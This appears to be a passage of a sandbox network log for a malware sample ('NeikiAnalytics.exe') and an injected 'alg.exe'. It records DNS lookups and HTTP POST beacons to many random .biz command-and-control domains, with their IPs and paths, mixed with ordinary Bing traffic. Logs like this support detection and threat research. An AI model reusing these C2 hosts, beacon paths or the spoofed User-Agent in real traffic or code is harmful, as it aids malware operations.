User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=802ec6a52bb42d6699da79d61065e2ad|191.101.209.39|1716145741|1716145741|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

npukfztj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/unactr

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

44.221.84.105:80

Request

POST /unactr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b040aa7a9aafacfd1178fa6b6866c699|191.101.209.39|1716145741|1716145741|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

npukfztj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/drgtbhjnlndog

alg.exe

Remote address:

44.221.84.105:80

Request

POST /drgtbhjnlndog HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=eee1ea81cfefbce91c8957984d524252|191.101.209.39|1716145741|1716145741|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

alg.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

54.157.24.8
POST

http://przvgke.biz/a

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

54.157.24.8:80

Request

POST /a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902
DNS

przvgke.biz

alg.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

54.157.24.8
POST

http://przvgke.biz/ruca

alg.exe

Remote address:

54.157.24.8:80

Request

POST /ruca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
POST

http://przvgke.biz/fsdcxictkrit

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

54.157.24.8:80

Request

POST /fsdcxictkrit HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902
POST

http://przvgke.biz/mrxhvkbvgys

alg.exe

Remote address:

54.157.24.8:80

Request

POST /mrxhvkbvgys HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

177.188.244.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.188.244.54.in-addr.arpa

IN PTR

Response

177.188.244.54.in-addr.arpa

IN PTR

ec2-54-244-188-177 us-west-2compute amazonawscom
DNS

22.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.160.190.20.in-addr.arpa

IN PTR

Response
DNS

8.24.157.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.24.157.54.in-addr.arpa

IN PTR

Response

8.24.157.54.in-addr.arpa

IN PTR

ec2-54-157-24-8 compute-1 amazonawscom
DNS

105.84.221.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.84.221.44.in-addr.arpa

IN PTR

Response

105.84.221.44.in-addr.arpa

IN PTR

ec2-44-221-84-105 compute-1 amazonawscom
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/vfxxyhxhf

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

Remote address:

18.141.10.107:80

Request

POST /vfxxyhxhf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 902

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=32322c2ec7956a56f4f95f7c50e9eb77|191.101.209.39|1716145742|1716145742|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/nthdnqdbrpf

alg.exe

Remote address:

18.141.10.107:80

Request

POST /nthdnqdbrpf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:09:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=00f25f131e83d7da87ca25bf48b15d78|191.101.209.39|1716145742|1716145742|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2AC428E02AD46D4207E23C642B346C32; domain=.bing.com; expires=Fri, 13-Jun-2025 19:09:05 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FF0CCE9C0DFD484E9CC19AB4C48CDFE5 Ref B: LON04EDGE1214 Ref C: 2024-05-19T19:09:05Z
date: Sun, 19 May 2024 19:09:04 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2AC428E02AD46D4207E23C642B346C32; _EDGE_S=SID=0978CF5B1A7E60C23E34DBDF1BBE6180

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=zf6Zk8DDhoXsw4VcnK1x_xU04mBRwKR5NcPi4xXlTHw; domain=.bing.com; expires=Fri, 13-Jun-2025 19:09:05 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D230241B917D4632840E7A4DF818D691 Ref B: LON04EDGE1214 Ref C: 2024-05-19T19:09:05Z
date: Sun, 19 May 2024 19:09:05 GMT
GET

https://www.bing.com/aes/c.gif?RG=8da969ca3c8e4167bdcebe09b4682839&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T115637Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

Remote address:

88.221.83.203:443

Request

GET /aes/c.gif?RG=8da969ca3c8e4167bdcebe09b4682839&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T115637Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2AC428E02AD46D4207E23C642B346C32

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 14A292FD85834789BCE8CC438AFE92E8 Ref B: DUS30EDGE0320 Ref C: 2024-05-19T19:09:05Z
content-length: 0
date: Sun, 19 May 2024 19:09:05 GMT
set-cookie: _EDGE_S=SID=0978CF5B1A7E60C23E34DBDF1BBE6180; path=/; httponly; domain=bing.com
set-cookie: MUIDB=2AC428E02AD46D4207E23C642B346C32; path=/; httponly; expires=Fri, 13-Jun-2025 19:09:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c753dd58.1716145745.ae2453b
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

203.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.83.221.88.in-addr.arpa

IN PTR

Response

203.83.221.88.in-addr.arpa

IN PTR

a88-221-83-203deploystaticakamaitechnologiescom
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

vjaxhpbji.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

98.58.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.58.20.217.in-addr.arpa

IN PTR

Response
DNS

xlfhhhm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

44.200.43.61
POST

http://xlfhhhm.biz/yumbgkyammrp

alg.exe

Remote address:

44.200.43.61:80

Request

POST /yumbgkyammrp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:10:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fe089088286a402529630955990786a4|191.101.209.39|1716145829|1716145829|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/ehfbrjk

alg.exe

Remote address:

13.251.16.150:80

Request

POST /ehfbrjk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:10:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=16ecb6ff2dc68dd7789c4b456aeff64a|191.101.209.39|1716145830|1716145830|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

61.43.200.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.43.200.44.in-addr.arpa

IN PTR

Response

61.43.200.44.in-addr.arpa

IN PTR

ec2-44-200-43-61 compute-1 amazonawscom
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR

Response

150.16.251.13.in-addr.arpa

IN PTR

ec2-13-251-16-150ap-southeast-1compute amazonawscom
DNS

saytjshyf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

3.237.86.197
POST

http://saytjshyf.biz/axmfwxqqokolryp

alg.exe

Remote address:

3.237.86.197:80

Request

POST /axmfwxqqokolryp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:10:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dfdfa9ee0e660b8e14328eb1850ea3cd|191.101.209.39|1716145833|1716145833|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/xqxepvdyam

alg.exe

Remote address:

18.141.10.107:80

Request

POST /xqxepvdyam HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:10:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c3f913b8b2f66ec2dcbaa08666275242|191.101.209.39|1716145834|1716145834|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

197.86.237.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.86.237.3.in-addr.arpa

IN PTR

Response

197.86.237.3.in-addr.arpa

IN PTR

ec2-3-237-86-197 compute-1 amazonawscom
DNS

197.86.237.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.86.237.3.in-addr.arpa

IN PTR

Response

197.86.237.3.in-addr.arpa

IN PTR

ec2-3-237-86-197 compute-1 amazonawscom
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN CNAME

77980.bodis.com

77980.bodis.com

IN A

199.59.243.225
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN CNAME

77980.bodis.com

77980.bodis.com

IN A

199.59.243.225
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 638730
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F01FF3148CA642F18E4D0F0C8C851C01 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:38Z
date: Sun, 19 May 2024 19:10:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 430689
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1A0EA0599AAE47DFB34CB1776165BDE3 Ref B: LON04EDGE0806 Ref C: 2024-05-19T19:10:38Z
date: Sun, 19 May 2024 19:10:37 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
